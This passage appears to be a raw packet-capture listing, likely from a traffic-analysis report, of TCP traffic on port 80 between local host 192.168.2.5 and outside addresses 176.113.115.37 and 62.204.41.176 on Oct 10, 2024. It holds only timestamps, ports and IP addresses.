                                                                                                                                  Oct 10, 2024 09:28:42.299958944 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.299976110 CEST4997980192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:28:42.299998045 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.300012112 CEST4997980192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:28:42.300035000 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.300050974 CEST4997980192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:28:42.300069094 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.300086975 CEST4997980192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:28:42.300103903 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.300123930 CEST4997980192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:28:42.300136089 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.300158978 CEST4997980192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:28:42.300170898 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.300188065 CEST4997980192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:28:42.300208092 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.300223112 CEST4997980192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:28:42.300241947 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.300259113 CEST4997980192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:28:42.300276995 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.300293922 CEST4997980192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:28:42.300312042 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.300329924 CEST4997980192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:28:42.300348043 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.300364017 CEST4997980192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:28:42.300384998 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.300401926 CEST4997980192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:28:42.300436974 CEST4997980192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:28:42.300445080 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.300481081 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.300499916 CEST4997980192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:28:42.300515890 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.300534010 CEST4997980192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:28:42.300550938 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.300569057 CEST4997980192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:28:42.300590038 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.300605059 CEST4997980192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:28:42.300643921 CEST4997980192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:28:42.338289022 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.338344097 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.338407993 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.338464022 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.338464975 CEST4997980192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:28:42.338495970 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.338516951 CEST4997980192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:28:42.338530064 CEST4997980192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:28:42.338548899 CEST4997980192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:28:42.338551044 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.338587046 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.338599920 CEST4997980192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:28:42.338624001 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.338638067 CEST4997980192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:28:42.338666916 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.338670015 CEST4997980192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:28:42.338716984 CEST4997980192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:28:42.338725090 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.338763952 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.338778019 CEST4997980192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:28:42.338815928 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.338828087 CEST4997980192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:28:42.338865042 CEST4997980192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:28:42.338875055 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.338908911 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.338927984 CEST4997980192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:28:42.338944912 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.338967085 CEST4997980192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:28:42.338979959 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.339010000 CEST4997980192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:28:42.339026928 CEST4997980192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:28:42.339040041 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.339076042 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.339091063 CEST4997980192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:28:42.339109898 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.339124918 CEST4997980192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:28:42.339144945 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.339162111 CEST4997980192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:28:42.339183092 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.339193106 CEST4997980192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:28:42.339217901 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.339231014 CEST4997980192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:28:42.339253902 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.339267969 CEST4997980192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:28:42.339288950 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.339302063 CEST4997980192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:28:42.339325905 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.339339972 CEST4997980192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:28:42.339360952 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.339375019 CEST4997980192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:28:42.339410067 CEST4997980192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:28:42.339430094 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.339466095 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.339478970 CEST4997980192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:28:42.339504957 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.339514971 CEST4997980192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:28:42.339541912 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.339554071 CEST4997980192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:28:42.339579105 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.339596033 CEST4997980192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:28:42.339617968 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.339628935 CEST4997980192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:28:42.339654922 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.339665890 CEST4997980192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:28:42.339689016 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.339701891 CEST4997980192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:28:42.339735985 CEST4997980192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:28:42.339747906 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.339785099 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.339798927 CEST4997980192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:28:42.339821100 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.339838028 CEST4997980192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:28:42.339855909 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.339870930 CEST4997980192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:28:42.339893103 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.339905024 CEST4997980192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:28:42.339940071 CEST4997980192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:28:42.339948893 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.339983940 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.339998960 CEST4997980192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:28:42.340030909 CEST4997980192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:28:42.340039015 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.340095043 CEST4997980192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:28:42.340094090 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.340130091 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.340150118 CEST4997980192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:28:42.340164900 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.340182066 CEST4997980192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:28:42.340199947 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.340218067 CEST4997980192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:28:42.340234995 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.340251923 CEST4997980192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:28:42.340269089 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.340286970 CEST4997980192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:28:42.340302944 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.340325117 CEST4997980192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:28:42.340347052 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.340363979 CEST4997980192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:28:42.340382099 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.340405941 CEST4997980192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:28:42.340418100 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.340437889 CEST4997980192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:28:42.340452909 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.340470076 CEST4997980192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:28:42.340492010 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.340506077 CEST4997980192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:28:42.340532064 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.340545893 CEST4997980192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:28:42.340569019 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.340586901 CEST4997980192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:28:42.340605974 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.340621948 CEST4997980192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:28:42.340641975 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.340667963 CEST4997980192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:28:42.340696096 CEST4997980192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:28:42.345571041 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.345633984 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.345643044 CEST4997980192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:28:42.345669985 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.345686913 CEST4997980192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:28:42.345720053 CEST4997980192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:28:42.345730066 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.345767975 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.345783949 CEST4997980192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:28:42.345822096 CEST4997980192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:28:42.345822096 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.345855951 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.345870972 CEST4997980192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:28:42.345894098 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.345912933 CEST4997980192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:28:42.345928907 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.345947027 CEST4997980192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:28:42.345963955 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.345987082 CEST4997980192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:28:42.345999956 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.346018076 CEST4997980192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:28:42.346034050 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.346050024 CEST4997980192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:28:42.346069098 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.346084118 CEST4997980192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:28:42.346105099 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.346122026 CEST4997980192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:28:42.346134901 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.346158981 CEST4997980192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:28:42.346179008 CEST4997980192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:28:42.346189022 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.346225023 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.346252918 CEST4997980192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:28:42.346260071 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.346272945 CEST4997980192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:28:42.346309900 CEST4997980192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:28:42.346316099 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.346352100 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.346371889 CEST4997980192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:28:42.346385956 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.346405029 CEST4997980192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:28:42.346421003 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.346440077 CEST4997980192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:28:42.346457958 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.346476078 CEST4997980192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:28:42.346493006 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.346512079 CEST4997980192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:28:42.346528053 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.346544027 CEST4997980192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:28:42.346561909 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.346579075 CEST4997980192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:28:42.346617937 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.346637011 CEST4997980192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:28:42.346649885 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.346669912 CEST4997980192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:28:42.346702099 CEST4997980192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:28:42.386919022 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.386951923 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.386965990 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.386980057 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.386991978 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.387006998 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.387021065 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.387032032 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.387043953 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.387056112 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.387077093 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.387092113 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.387104034 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.387116909 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.387130022 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.387141943 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.387155056 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.387167931 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.387172937 CEST4997980192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:28:42.387178898 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.387192011 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.387233973 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.387245893 CEST4997980192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:28:42.387279034 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.387280941 CEST4997980192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:28:42.387293100 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.387305975 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:42.387336969 CEST4997980192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:28:42.387363911 CEST4997980192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:28:47.212658882 CEST8049979176.113.115.37192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:47.212790012 CEST4997980192.168.2.5176.113.115.37
                                                                                                                                  Oct 10, 2024 09:28:54.460735083 CEST4998080192.168.2.562.204.41.176
                                                                                                                                  Oct 10, 2024 09:28:54.465719938 CEST804998062.204.41.176192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:54.465804100 CEST4998080192.168.2.562.204.41.176
                                                                                                                                  Oct 10, 2024 09:28:54.465965033 CEST4998080192.168.2.562.204.41.176
                                                                                                                                  Oct 10, 2024 09:28:54.470954895 CEST804998062.204.41.176192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:55.157658100 CEST804998062.204.41.176192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:55.158989906 CEST4998080192.168.2.562.204.41.176
                                                                                                                                  Oct 10, 2024 09:28:55.200732946 CEST4998080192.168.2.562.204.41.176
                                                                                                                                  Oct 10, 2024 09:28:55.205578089 CEST804998062.204.41.176192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:56.088943958 CEST804998062.204.41.176192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:56.090328932 CEST4998080192.168.2.562.204.41.176
                                                                                                                                  Oct 10, 2024 09:28:56.091892958 CEST4998080192.168.2.562.204.41.176
                                                                                                                                  Oct 10, 2024 09:28:56.097743034 CEST804998062.204.41.176192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:56.314738989 CEST804998062.204.41.176192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:56.315078020 CEST4998080192.168.2.562.204.41.176
                                                                                                                                  Oct 10, 2024 09:28:56.315362930 CEST804998062.204.41.176192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:56.315429926 CEST4998080192.168.2.562.204.41.176
                                                                                                                                  Oct 10, 2024 09:28:56.316909075 CEST4998080192.168.2.562.204.41.176
                                                                                                                                  Oct 10, 2024 09:28:56.321716070 CEST804998062.204.41.176192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:56.552234888 CEST804998062.204.41.176192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:56.552261114 CEST804998062.204.41.176192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:56.552275896 CEST804998062.204.41.176192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:56.552292109 CEST804998062.204.41.176192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:56.552308083 CEST804998062.204.41.176192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:56.552323103 CEST804998062.204.41.176192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:56.552328110 CEST4998080192.168.2.562.204.41.176
                                                                                                                                  Oct 10, 2024 09:28:56.552361965 CEST4998080192.168.2.562.204.41.176
                                                                                                                                  Oct 10, 2024 09:28:56.554615974 CEST4998080192.168.2.562.204.41.176
                                                                                                                                  Oct 10, 2024 09:28:56.559513092 CEST804998062.204.41.176192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:56.781467915 CEST804998062.204.41.176192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:56.781569004 CEST4998080192.168.2.562.204.41.176
                                                                                                                                  Oct 10, 2024 09:28:56.806358099 CEST4998080192.168.2.562.204.41.176
                                                                                                                                  Oct 10, 2024 09:28:56.806412935 CEST4998080192.168.2.562.204.41.176
                                                                                                                                  Oct 10, 2024 09:28:56.811155081 CEST804998062.204.41.176192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:56.811278105 CEST804998062.204.41.176192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:56.811291933 CEST804998062.204.41.176192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:56.811304092 CEST804998062.204.41.176192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:56.811316013 CEST804998062.204.41.176192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:56.811357021 CEST804998062.204.41.176192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:57.189971924 CEST804998062.204.41.176192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:57.190119028 CEST4998080192.168.2.562.204.41.176
                                                                                                                                  Oct 10, 2024 09:28:57.463040113 CEST4998080192.168.2.562.204.41.176
                                                                                                                                  Oct 10, 2024 09:28:57.467952967 CEST804998062.204.41.176192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:57.681269884 CEST804998062.204.41.176192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:57.681296110 CEST804998062.204.41.176192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:57.681313038 CEST804998062.204.41.176192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:57.681328058 CEST804998062.204.41.176192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:57.681343079 CEST804998062.204.41.176192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:57.681345940 CEST4998080192.168.2.562.204.41.176
                                                                                                                                  Oct 10, 2024 09:28:57.681360006 CEST804998062.204.41.176192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:57.681372881 CEST4998080192.168.2.562.204.41.176
                                                                                                                                  Oct 10, 2024 09:28:57.681375980 CEST804998062.204.41.176192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:57.681391001 CEST804998062.204.41.176192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:57.681407928 CEST804998062.204.41.176192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:57.681416035 CEST4998080192.168.2.562.204.41.176
                                                                                                                                  Oct 10, 2024 09:28:57.681437969 CEST4998080192.168.2.562.204.41.176
                                                                                                                                  Oct 10, 2024 09:28:57.681457996 CEST4998080192.168.2.562.204.41.176
                                                                                                                                  Oct 10, 2024 09:28:57.682010889 CEST804998062.204.41.176192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:57.682054043 CEST4998080192.168.2.562.204.41.176
                                                                                                                                  Oct 10, 2024 09:28:57.682069063 CEST804998062.204.41.176192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:57.682084084 CEST804998062.204.41.176192.168.2.5
                                                                                                                                  Oct 10, 2024 09:28:57.682115078 CEST4998080192.168.2.562.204.41.176
